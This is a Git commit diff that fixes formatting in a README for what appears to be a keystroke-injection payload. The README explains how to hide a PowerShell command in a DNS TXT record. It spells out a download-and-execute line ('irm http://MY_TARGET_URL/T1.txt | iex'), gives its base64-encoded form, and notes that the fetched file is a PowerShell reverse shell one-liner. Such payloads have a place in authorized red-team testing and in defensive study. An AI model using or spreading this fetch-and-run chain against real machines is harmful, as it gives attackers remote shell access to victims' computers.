Update README.md

fixed formatting
pull/468/head
Nate 2024-08-04 18:01:43 -05:00 committed by GitHub
parent ae0d976dce
commit 5ff699caa2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 1 additions and 1 deletions

View File

@ -17,7 +17,7 @@ Category: Execution
Other commands can be added to DNS TXT record rather than the example below. Other commands can be added to DNS TXT record rather than the example below.
No base64 can be used as an option by replacing "$a=",";powershell -e $a" with just "|iex" for the STRINGLN payload. Examples of the decoded command and encoded command are shown below to put into the DNS TXT record. No base64 can be used as an option by replacing "$a=",";powershell -e $a" with just "|iex" for the STRINGLN payload. Examples of the decoded command and encoded command are shown below to put into the DNS TXT record.
Decoded: "irm http://MY_TARGET_URL/T1.txt | iex" Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"\
Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA==" Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
powershellReverseShellOne-liner.ps1 is identical to T1.txt. (shortened due to character limitations)\ powershellReverseShellOne-liner.ps1 is identical to T1.txt. (shortened due to character limitations)\